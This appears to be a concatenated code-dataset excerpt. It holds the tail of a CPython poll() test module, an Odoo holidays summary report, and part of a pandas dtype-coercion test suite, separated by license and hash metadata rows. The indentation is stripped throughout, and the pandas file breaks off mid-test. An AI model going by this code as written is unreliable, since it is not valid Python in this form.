MSG_LEN = len(MSG)
readers = []
writers = []
r2w = {}
w2r = {}
for i in range(NUM_PIPES):
rd, wr = os.pipe()
p.register(rd)
p.modify(rd, select.POLLIN)
p.register(wr, select.POLLOUT)
readers.append(rd)
writers.append(wr)
r2w[rd] = wr
w2r[wr] = rd
bufs = []
while writers:
ready = p.poll()
ready_writers = find_ready_matching(ready, select.POLLOUT)
if not ready_writers:
raise RuntimeError, "no pipes ready for writing"
wr = random.choice(ready_writers)
os.write(wr, MSG)
ready = p.poll()
ready_readers = find_ready_matching(ready, select.POLLIN)
if not ready_readers:
raise RuntimeError, "no pipes ready for reading"
rd = random.choice(ready_readers)
buf = os.read(rd, MSG_LEN)
self.assertEqual(len(buf), MSG_LEN)
bufs.append(buf)
os.close(r2w[rd]) ; os.close( rd )
p.unregister( r2w[rd] )
p.unregister( rd )
writers.remove(r2w[rd])
self.assertEqual(bufs, [MSG] * NUM_PIPES)
def poll_unit_tests(self):
# returns NVAL for invalid file descriptor
FD = 42
try:
os.close(FD)
except OSError:
pass
p = select.poll()
p.register(FD)
r = p.poll()
self.assertEqual(r[0], (FD, select.POLLNVAL))
f = open(TESTFN, 'w')
fd = f.fileno()
p = select.poll()
p.register(f)
r = p.poll()
self.assertEqual(r[0][0], fd)
f.close()
r = p.poll()
self.assertEqual(r[0], (fd, select.POLLNVAL))
os.unlink(TESTFN)
# type error for invalid arguments
p = select.poll()
self.assertRaises(TypeError, p.register, p)
self.assertRaises(TypeError, p.unregister, p)
# can't unregister non-existent object
p = select.poll()
self.assertRaises(KeyError, p.unregister, 3)
# Test error cases
pollster = select.poll()
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
self.assertRaises(TypeError, pollster.register, Nope(), 0)
self.assertRaises(TypeError, pollster.register, Almost(), 0)
# Another test case for poll(). This is copied from the test case for
# select(), modified to use poll() instead.
def test_poll2(self):
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
p = os.popen(cmd, 'r')
pollster = select.poll()
pollster.register( p, select.POLLIN )
for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10:
fdlist = pollster.poll(tout)
if (fdlist == []):
continue
fd, flags = fdlist[0]
if flags & select.POLLHUP:
line = p.readline()
if line != "":
self.fail('error: pipe seems to be closed, but still returns data')
continue
elif flags & select.POLLIN:
line = p.readline()
if not line:
break
continue
else:
self.fail('Unexpected return value from select.poll: %s' % fdlist)
p.close()
def test_poll3(self):
# test int overflow
pollster = select.poll()
pollster.register(1)
self.assertRaises(OverflowError, pollster.poll, 1L << 64)
x = 2 + 3
if x != 5:
self.fail('Overflow must have occurred')
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, -1)
self.assertRaises(OverflowError, pollster.register, 0, 1 << 64)
self.assertRaises(OverflowError, pollster.modify, 1, -1)
self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64)
@cpython_only
def test_poll_c_limits(self):
from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX
pollster = select.poll()
pollster.register(1)
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1)
@unittest.skipUnless(threading, 'Threading required for this test.')
@reap_threads
def test_threaded_poll(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
rfds = []
for i in range(10):
fd = os.dup(r)
self.addCleanup(os.close, fd)
rfds.append(fd)
pollster = select.poll()
for fd in rfds:
pollster.register(fd, select.POLLIN)
t = threading.Thread(target=pollster.poll)
t.start()
try:
time.sleep(0.5)
# trigger ufds array reallocation
for fd in rfds:
pollster.unregister(fd)
pollster.register(w, select.POLLOUT)
self.assertRaises(RuntimeError, pollster.poll)
finally:
# and make the call to poll() from the thread return
os.write(w, b'spam')
t.join()
def test_main():
run_unittest(PollTests)
if __name__ == '__main__':
test_main()
| gpl-2.0 | 6,599,632,463,478,398,000 | 29.131455 | 87 | 0.549392 | false |
akretion/odoo | addons/hr_holidays/report/holidays_summary_report.py | 21 | 5828 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import calendar
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, _
from odoo.exceptions import UserError
class HrHolidaySummaryReport(models.AbstractModel):
_name = 'report.hr_holidays.report_holidayssummary'
_description = 'Holidays Summary Report'
def _get_header_info(self, start_date, holiday_type):
st_date = fields.Date.from_string(start_date)
return {
'start_date': fields.Date.to_string(st_date),
'end_date': fields.Date.to_string(st_date + relativedelta(days=59)),
'holiday_type': 'Confirmed and Approved' if holiday_type == 'both' else holiday_type
}
def _date_is_day_off(self, date):
return date.weekday() in (calendar.SATURDAY, calendar.SUNDAY,)
def _get_day(self, start_date):
res = []
start_date = fields.Date.from_string(start_date)
for x in range(0, 60):
color = '#ababab' if self._date_is_day_off(start_date) else ''
res.append({'day_str': start_date.strftime('%a'), 'day': start_date.day , 'color': color})
start_date = start_date + relativedelta(days=1)
return res
def _get_months(self, start_date):
        # It works for getting month names between two dates.
res = []
start_date = fields.Date.from_string(start_date)
end_date = start_date + relativedelta(days=59)
while start_date <= end_date:
last_date = start_date + relativedelta(day=1, months=+1, days=-1)
if last_date > end_date:
last_date = end_date
month_days = (last_date - start_date).days + 1
res.append({'month_name': start_date.strftime('%B'), 'days': month_days})
start_date += relativedelta(day=1, months=+1)
return res
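    # Illustrative worked example: with start_date '2019-01-15' the 60-day
    # window ends on 2019-03-15, so this returns
    #   [{'month_name': 'January', 'days': 17},
    #    {'month_name': 'February', 'days': 28},
    #    {'month_name': 'March', 'days': 15}]
    # (17 + 28 + 15 = 60, non-leap year).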
def _get_leaves_summary(self, start_date, empid, holiday_type):
res = []
count = 0
start_date = fields.Date.from_string(start_date)
end_date = start_date + relativedelta(days=59)
for index in range(0, 60):
current = start_date + timedelta(index)
res.append({'day': current.day, 'color': ''})
if self._date_is_day_off(current) :
res[index]['color'] = '#ababab'
# count and get leave summary details.
holiday_type = ['confirm','validate'] if holiday_type == 'both' else ['confirm'] if holiday_type == 'Confirmed' else ['validate']
holidays = self.env['hr.leave'].search([
('employee_id', '=', empid), ('state', 'in', holiday_type),
('date_from', '<=', str(end_date)),
('date_to', '>=', str(start_date))
])
for holiday in holidays:
# Convert date to user timezone, otherwise the report will not be consistent with the
# value displayed in the interface.
date_from = fields.Datetime.from_string(holiday.date_from)
date_from = fields.Datetime.context_timestamp(holiday, date_from).date()
date_to = fields.Datetime.from_string(holiday.date_to)
date_to = fields.Datetime.context_timestamp(holiday, date_to).date()
for index in range(0, ((date_to - date_from).days + 1)):
if date_from >= start_date and date_from <= end_date:
res[(date_from-start_date).days]['color'] = holiday.holiday_status_id.color_name
date_from += timedelta(1)
count += holiday.number_of_days
self.sum = count
return res
def _get_data_from_report(self, data):
res = []
Employee = self.env['hr.employee']
if 'depts' in data:
for department in self.env['hr.department'].browse(data['depts']):
res.append({'dept' : department.name, 'data': [], 'color': self._get_day(data['date_from'])})
for emp in Employee.search([('department_id', '=', department.id)]):
res[len(res)-1]['data'].append({
'emp': emp.name,
'display': self._get_leaves_summary(data['date_from'], emp.id, data['holiday_type']),
'sum': self.sum
})
elif 'emp' in data:
res.append({'data':[]})
for emp in Employee.browse(data['emp']):
res[0]['data'].append({
'emp': emp.name,
'display': self._get_leaves_summary(data['date_from'], emp.id, data['holiday_type']),
'sum': self.sum
})
return res
def _get_holidays_status(self):
res = []
for holiday in self.env['hr.leave.type'].search([]):
res.append({'color': holiday.color_name, 'name': holiday.name})
return res
@api.model
def _get_report_values(self, docids, data=None):
if not data.get('form'):
raise UserError(_("Form content is missing, this report cannot be printed."))
holidays_report = self.env['ir.actions.report']._get_report_from_name('hr_holidays.report_holidayssummary')
holidays = self.env['hr.leave'].browse(self.ids)
return {
'doc_ids': self.ids,
'doc_model': holidays_report.model,
'docs': holidays,
'get_header_info': self._get_header_info(data['form']['date_from'], data['form']['holiday_type']),
'get_day': self._get_day(data['form']['date_from']),
'get_months': self._get_months(data['form']['date_from']),
'get_data_from_report': self._get_data_from_report(data['form']),
'get_holidays_status': self._get_holidays_status(),
}
| agpl-3.0 | 5,797,469,761,828,736,000 | 45.253968 | 137 | 0.566918 | false |
jreback/pandas | pandas/tests/indexing/test_coercion.py | 1 | 39801 | from datetime import timedelta
import itertools
from typing import Dict, List
import numpy as np
import pytest
from pandas.compat import IS64, is_platform_windows
import pandas as pd
import pandas._testing as tm
###############################################################
# Index / Series common tests which may trigger dtype coercions
###############################################################
@pytest.fixture(autouse=True, scope="class")
def check_comprehensiveness(request):
    # Iterate over combinations of dtype, method and klass
    # and ensure that each is contained within a collected test
cls = request.cls
combos = itertools.product(cls.klasses, cls.dtypes, [cls.method])
def has_test(combo):
klass, dtype, method = combo
cls_funcs = request.node.session.items
return any(
klass in x.name and dtype in x.name and method in x.name for x in cls_funcs
)
opts = request.config.option
if opts.lf or opts.keyword:
# If we are running with "last-failed" or -k foo, we expect to only
# run a subset of tests.
yield
else:
for combo in combos:
if not has_test(combo):
raise AssertionError(
f"test method is not defined: {cls.__name__}, {combo}"
)
yield
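# Illustrative example: one combo produced above is ("series", "int64",
# "setitem"); it counts as covered because the collected test name
# "test_setitem_series_int64" contains all three substrings.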
class CoercionBase:
klasses = ["index", "series"]
dtypes = [
"object",
"int64",
"float64",
"complex128",
"bool",
"datetime64",
"datetime64tz",
"timedelta64",
"period",
]
@property
def method(self):
raise NotImplementedError(self)
def _assert(self, left, right, dtype):
# explicitly check dtype to avoid any unexpected result
if isinstance(left, pd.Series):
tm.assert_series_equal(left, right)
elif isinstance(left, pd.Index):
tm.assert_index_equal(left, right)
else:
raise NotImplementedError
assert left.dtype == dtype
assert right.dtype == dtype
class TestSetitemCoercion(CoercionBase):
method = "setitem"
def _assert_setitem_series_conversion(
self, original_series, loc_value, expected_series, expected_dtype
):
""" test series value's coercion triggered by assignment """
temp = original_series.copy()
temp[1] = loc_value
tm.assert_series_equal(temp, expected_series)
# check dtype explicitly for sure
assert temp.dtype == expected_dtype
# .loc works different rule, temporary disable
# temp = original_series.copy()
# temp.loc[1] = loc_value
# tm.assert_series_equal(temp, expected_series)
@pytest.mark.parametrize(
"val,exp_dtype", [(1, object), (1.1, object), (1 + 1j, object), (True, object)]
)
def test_setitem_series_object(self, val, exp_dtype):
obj = pd.Series(list("abcd"))
assert obj.dtype == object
exp = pd.Series(["a", val, "c", "d"])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(1, np.int64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_setitem_series_int64(self, val, exp_dtype, request):
obj = pd.Series([1, 2, 3, 4])
assert obj.dtype == np.int64
if exp_dtype is np.float64:
exp = pd.Series([1, 1, 3, 4])
self._assert_setitem_series_conversion(obj, 1.1, exp, np.int64)
mark = pytest.mark.xfail(reason="GH12747 The result must be float")
request.node.add_marker(mark)
exp = pd.Series([1, val, 3, 4])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(np.int32(1), np.int8), (np.int16(2 ** 9), np.int16)]
)
def test_setitem_series_int8(self, val, exp_dtype, request):
obj = pd.Series([1, 2, 3, 4], dtype=np.int8)
assert obj.dtype == np.int8
if exp_dtype is np.int16:
exp = pd.Series([1, 0, 3, 4], dtype=np.int8)
self._assert_setitem_series_conversion(obj, val, exp, np.int8)
mark = pytest.mark.xfail(
reason="BUG: it must be pd.Series([1, 1, 3, 4], dtype=np.int16"
)
request.node.add_marker(mark)
exp = pd.Series([1, val, 3, 4], dtype=np.int8)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(1, np.float64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_setitem_series_float64(self, val, exp_dtype):
obj = pd.Series([1.1, 2.2, 3.3, 4.4])
assert obj.dtype == np.float64
exp = pd.Series([1.1, val, 3.3, 4.4])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, object),
],
)
def test_setitem_series_complex128(self, val, exp_dtype):
obj = pd.Series([1 + 1j, 2 + 2j, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
exp = pd.Series([1 + 1j, val, 3 + 3j, 4 + 4j])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(1, np.int64),
(3, np.int64),
(1.1, np.float64),
(1 + 1j, np.complex128),
(True, np.bool_),
],
)
def test_setitem_series_bool(self, val, exp_dtype, request):
obj = pd.Series([True, False, True, False])
assert obj.dtype == np.bool_
mark = None
if exp_dtype is np.int64:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool_)
mark = pytest.mark.xfail(reason="TODO_GH12747 The result must be int")
elif exp_dtype is np.float64:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool_)
mark = pytest.mark.xfail(reason="TODO_GH12747 The result must be float")
elif exp_dtype is np.complex128:
exp = pd.Series([True, True, True, False])
self._assert_setitem_series_conversion(obj, val, exp, np.bool_)
mark = pytest.mark.xfail(reason="TODO_GH12747 The result must be complex")
if mark is not None:
request.node.add_marker(mark)
exp = pd.Series([True, val, True, False])
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(pd.Timestamp("2012-01-01"), "datetime64[ns]"), (1, object), ("x", object)],
)
def test_setitem_series_datetime64(self, val, exp_dtype):
obj = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
val,
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
(pd.Timestamp("2012-01-01", tz="US/Pacific"), object),
(pd.Timestamp("2012-01-01"), object),
(1, object),
],
)
def test_setitem_series_datetime64tz(self, val, exp_dtype):
tz = "US/Eastern"
obj = pd.Series(
[
pd.Timestamp("2011-01-01", tz=tz),
pd.Timestamp("2011-01-02", tz=tz),
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
assert obj.dtype == "datetime64[ns, US/Eastern]"
exp = pd.Series(
[
pd.Timestamp("2011-01-01", tz=tz),
val,
pd.Timestamp("2011-01-03", tz=tz),
pd.Timestamp("2011-01-04", tz=tz),
]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype",
[(pd.Timedelta("12 day"), "timedelta64[ns]"), (1, object), ("x", object)],
)
def test_setitem_series_timedelta64(self, val, exp_dtype):
obj = pd.Series(
[
pd.Timedelta("1 day"),
pd.Timedelta("2 day"),
pd.Timedelta("3 day"),
pd.Timedelta("4 day"),
]
)
assert obj.dtype == "timedelta64[ns]"
exp = pd.Series(
[pd.Timedelta("1 day"), val, pd.Timedelta("3 day"), pd.Timedelta("4 day")]
)
self._assert_setitem_series_conversion(obj, val, exp, exp_dtype)
def _assert_setitem_index_conversion(
self, original_series, loc_key, expected_index, expected_dtype
):
""" test index's coercion triggered by assign key """
temp = original_series.copy()
temp[loc_key] = 5
exp = pd.Series([1, 2, 3, 4, 5], index=expected_index)
tm.assert_series_equal(temp, exp)
# check dtype explicitly for sure
assert temp.index.dtype == expected_dtype
temp = original_series.copy()
temp.loc[loc_key] = 5
exp = pd.Series([1, 2, 3, 4, 5], index=expected_index)
tm.assert_series_equal(temp, exp)
# check dtype explicitly for sure
assert temp.index.dtype == expected_dtype
@pytest.mark.parametrize(
"val,exp_dtype", [("x", object), (5, IndexError), (1.1, object)]
)
def test_setitem_index_object(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4], index=list("abcd"))
assert obj.index.dtype == object
if exp_dtype is IndexError:
temp = obj.copy()
msg = "index 5 is out of bounds for axis 0 with size 4"
with pytest.raises(exp_dtype, match=msg):
temp[5] = 5
else:
exp_index = pd.Index(list("abcd") + [val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(5, np.int64), (1.1, np.float64), ("x", object)]
)
def test_setitem_index_int64(self, val, exp_dtype):
obj = pd.Series([1, 2, 3, 4])
assert obj.index.dtype == np.int64
exp_index = pd.Index([0, 1, 2, 3, val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.parametrize(
"val,exp_dtype", [(5, IndexError), (5.1, np.float64), ("x", object)]
)
def test_setitem_index_float64(self, val, exp_dtype, request):
obj = pd.Series([1, 2, 3, 4], index=[1.1, 2.1, 3.1, 4.1])
assert obj.index.dtype == np.float64
if exp_dtype is IndexError:
# float + int -> int
temp = obj.copy()
msg = "index 5 is out of bounds for axis 0 with size 4"
with pytest.raises(exp_dtype, match=msg):
temp[5] = 5
mark = pytest.mark.xfail(reason="TODO_GH12747 The result must be float")
request.node.add_marker(mark)
exp_index = pd.Index([1.1, 2.1, 3.1, 4.1, val])
self._assert_setitem_index_conversion(obj, val, exp_index, exp_dtype)
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_series_period(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_complex128(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_bool(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_datetime64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_datetime64tz(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_timedelta64(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_setitem_index_period(self):
raise NotImplementedError
class TestInsertIndexCoercion(CoercionBase):
klasses = ["index"]
method = "insert"
def _assert_insert_conversion(self, original, value, expected, expected_dtype):
""" test coercion triggered by insert """
target = original.copy()
res = target.insert(1, value)
tm.assert_index_equal(res, expected)
assert res.dtype == expected_dtype
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1, object),
(1.1, 1.1, object),
(False, False, object),
("x", "x", object),
],
)
def test_insert_index_object(self, insert, coerced_val, coerced_dtype):
obj = pd.Index(list("abcd"))
assert obj.dtype == object
exp = pd.Index(["a", coerced_val, "b", "c", "d"])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1, np.int64),
(1.1, 1.1, np.float64),
(False, False, object), # GH#36319
("x", "x", object),
],
)
def test_insert_index_int64(self, insert, coerced_val, coerced_dtype):
obj = pd.Int64Index([1, 2, 3, 4])
assert obj.dtype == np.int64
exp = pd.Index([1, coerced_val, 2, 3, 4])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(1, 1.0, np.float64),
(1.1, 1.1, np.float64),
(False, False, object), # GH#36319
("x", "x", object),
],
)
def test_insert_index_float64(self, insert, coerced_val, coerced_dtype):
obj = pd.Float64Index([1.0, 2.0, 3.0, 4.0])
assert obj.dtype == np.float64
exp = pd.Index([1.0, coerced_val, 2.0, 3.0, 4.0])
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), "datetime64[ns, US/Eastern]"),
],
ids=["datetime64", "datetime64tz"],
)
def test_insert_index_datetimes(self, fill_val, exp_dtype):
obj = pd.DatetimeIndex(
["2011-01-01", "2011-01-02", "2011-01-03", "2011-01-04"], tz=fill_val.tz
)
assert obj.dtype == exp_dtype
exp = pd.DatetimeIndex(
["2011-01-01", fill_val.date(), "2011-01-02", "2011-01-03", "2011-01-04"],
tz=fill_val.tz,
)
self._assert_insert_conversion(obj, fill_val, exp, exp_dtype)
if fill_val.tz:
msg = "Cannot compare tz-naive and tz-aware"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01"))
msg = "Timezones don't match"
with pytest.raises(ValueError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01", tz="Asia/Tokyo"))
else:
msg = "Cannot compare tz-naive and tz-aware"
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01", tz="Asia/Tokyo"))
msg = "value should be a 'Timestamp' or 'NaT'. Got 'int' instead."
with pytest.raises(TypeError, match=msg):
obj.insert(1, 1)
pytest.xfail("ToDo: must coerce to object")
def test_insert_index_timedelta64(self):
obj = pd.TimedeltaIndex(["1 day", "2 day", "3 day", "4 day"])
assert obj.dtype == "timedelta64[ns]"
# timedelta64 + timedelta64 => timedelta64
exp = pd.TimedeltaIndex(["1 day", "10 day", "2 day", "3 day", "4 day"])
self._assert_insert_conversion(
obj, pd.Timedelta("10 day"), exp, "timedelta64[ns]"
)
# ToDo: must coerce to object
msg = "value should be a 'Timedelta' or 'NaT'. Got 'Timestamp' instead."
with pytest.raises(TypeError, match=msg):
obj.insert(1, pd.Timestamp("2012-01-01"))
# ToDo: must coerce to object
msg = "value should be a 'Timedelta' or 'NaT'. Got 'int' instead."
with pytest.raises(TypeError, match=msg):
obj.insert(1, 1)
@pytest.mark.parametrize(
"insert, coerced_val, coerced_dtype",
[
(pd.Period("2012-01", freq="M"), "2012-01", "period[M]"),
(pd.Timestamp("2012-01-01"), pd.Timestamp("2012-01-01"), object),
(1, 1, object),
("x", "x", object),
],
)
def test_insert_index_period(self, insert, coerced_val, coerced_dtype):
obj = pd.PeriodIndex(["2011-01", "2011-02", "2011-03", "2011-04"], freq="M")
assert obj.dtype == "period[M]"
data = [
pd.Period("2011-01", freq="M"),
coerced_val,
pd.Period("2011-02", freq="M"),
pd.Period("2011-03", freq="M"),
pd.Period("2011-04", freq="M"),
]
if isinstance(insert, pd.Period):
exp = pd.PeriodIndex(data, freq="M")
self._assert_insert_conversion(obj, insert, exp, coerced_dtype)
else:
msg = r"Unexpected keyword arguments {'freq'}"
with pytest.raises(TypeError, match=msg):
with tm.assert_produces_warning(FutureWarning):
# passing keywords to pd.Index
pd.Index(data, freq="M")
@pytest.mark.xfail(reason="Test not implemented")
def test_insert_index_complex128(self):
raise NotImplementedError
@pytest.mark.xfail(reason="Test not implemented")
def test_insert_index_bool(self):
raise NotImplementedError
class TestWhereCoercion(CoercionBase):
method = "where"
def _assert_where_conversion(
self, original, cond, values, expected, expected_dtype
):
""" test coercion triggered by where """
target = original.copy()
res = target.where(cond, values)
self._assert(res, expected, expected_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, object), (1.1, object), (1 + 1j, object), (True, object)],
)
def test_where_object(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
obj = klass(list("abcd"))
assert obj.dtype == object
cond = klass([True, False, True, False])
if fill_val is True and klass is pd.Series:
ret_val = 1
else:
ret_val = fill_val
exp = klass(["a", ret_val, "c", ret_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(fill_val * x for x in [5, 6, 7, 8])
exp = klass(["a", values[1], "c", values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, np.int64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_where_int64(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
if klass is pd.Index and exp_dtype is np.complex128:
pytest.skip("Complex Index not supported")
obj = klass([1, 2, 3, 4])
assert obj.dtype == np.int64
cond = klass([True, False, True, False])
exp = klass([1, fill_val, 3, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(x * fill_val for x in [5, 6, 7, 8])
exp = klass([1, values[1], 3, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val, exp_dtype",
[(1, np.float64), (1.1, np.float64), (1 + 1j, np.complex128), (True, object)],
)
def test_where_float64(self, index_or_series, fill_val, exp_dtype):
klass = index_or_series
if klass is pd.Index and exp_dtype is np.complex128:
pytest.skip("Complex Index not supported")
obj = klass([1.1, 2.2, 3.3, 4.4])
assert obj.dtype == np.float64
cond = klass([True, False, True, False])
exp = klass([1.1, fill_val, 3.3, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = klass([True, False, True, True])
else:
values = klass(x * fill_val for x in [5, 6, 7, 8])
exp = klass([1.1, values[1], 3.3, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(1, np.complex128),
(1.1, np.complex128),
(1 + 1j, np.complex128),
(True, object),
],
)
def test_where_series_complex128(self, fill_val, exp_dtype):
obj = pd.Series([1 + 1j, 2 + 2j, 3 + 3j, 4 + 4j])
assert obj.dtype == np.complex128
cond = pd.Series([True, False, True, False])
exp = pd.Series([1 + 1j, fill_val, 3 + 3j, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = pd.Series([True, False, True, True])
else:
values = pd.Series(x * fill_val for x in [5, 6, 7, 8])
exp = pd.Series([1 + 1j, values[1], 3 + 3j, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[(1, object), (1.1, object), (1 + 1j, object), (True, np.bool_)],
)
def test_where_series_bool(self, fill_val, exp_dtype):
obj = pd.Series([True, False, True, False])
assert obj.dtype == np.bool_
cond = pd.Series([True, False, True, False])
exp = pd.Series([True, fill_val, True, fill_val])
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
if fill_val is True:
values = pd.Series([True, False, True, True])
else:
values = pd.Series(x * fill_val for x in [5, 6, 7, 8])
exp = pd.Series([True, values[1], True, values[3]])
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val,exp_dtype",
[
(pd.Timestamp("2012-01-01"), "datetime64[ns]"),
(pd.Timestamp("2012-01-01", tz="US/Eastern"), object),
],
ids=["datetime64", "datetime64tz"],
)
def test_where_series_datetime64(self, fill_val, exp_dtype):
obj = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Series([True, False, True, False])
exp = pd.Series(
[pd.Timestamp("2011-01-01"), fill_val, pd.Timestamp("2011-01-03"), fill_val]
)
self._assert_where_conversion(obj, cond, fill_val, exp, exp_dtype)
values = pd.Series(pd.date_range(fill_val, periods=4))
if fill_val.tz:
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02 00:00", tz="US/Eastern"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04 00:00", tz="US/Eastern"),
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
exp = pd.Series(
[
pd.Timestamp("2011-01-01"),
values[1],
pd.Timestamp("2011-01-03"),
values[3],
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.parametrize(
"fill_val",
[
pd.Timestamp("2012-01-01"),
pd.Timestamp("2012-01-01").to_datetime64(),
pd.Timestamp("2012-01-01").to_pydatetime(),
],
)
def test_where_index_datetime(self, fill_val):
exp_dtype = "datetime64[ns]"
obj = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Index([True, False, True, False])
result = obj.where(cond, fill_val)
expected = pd.DatetimeIndex([obj[0], fill_val, obj[2], fill_val])
tm.assert_index_equal(result, expected)
values = pd.Index(pd.date_range(fill_val, periods=4))
exp = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2012-01-04"),
]
)
self._assert_where_conversion(obj, cond, values, exp, exp_dtype)
@pytest.mark.xfail(reason="GH 22839: do not ignore timezone, must be object")
def test_where_index_datetime64tz(self):
fill_val = pd.Timestamp("2012-01-01", tz="US/Eastern")
exp_dtype = object
obj = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2011-01-02"),
pd.Timestamp("2011-01-03"),
pd.Timestamp("2011-01-04"),
]
)
assert obj.dtype == "datetime64[ns]"
cond = pd.Index([True, False, True, False])
msg = "Index\\(\\.\\.\\.\\) must be called with a collection of some kind"
with pytest.raises(TypeError, match=msg):
obj.where(cond, fill_val)
values = pd.Index(pd.date_range(fill_val, periods=4))
exp = pd.Index(
[
pd.Timestamp("2011-01-01"),
pd.Timestamp("2012-01-02", tz="US/Eastern"),
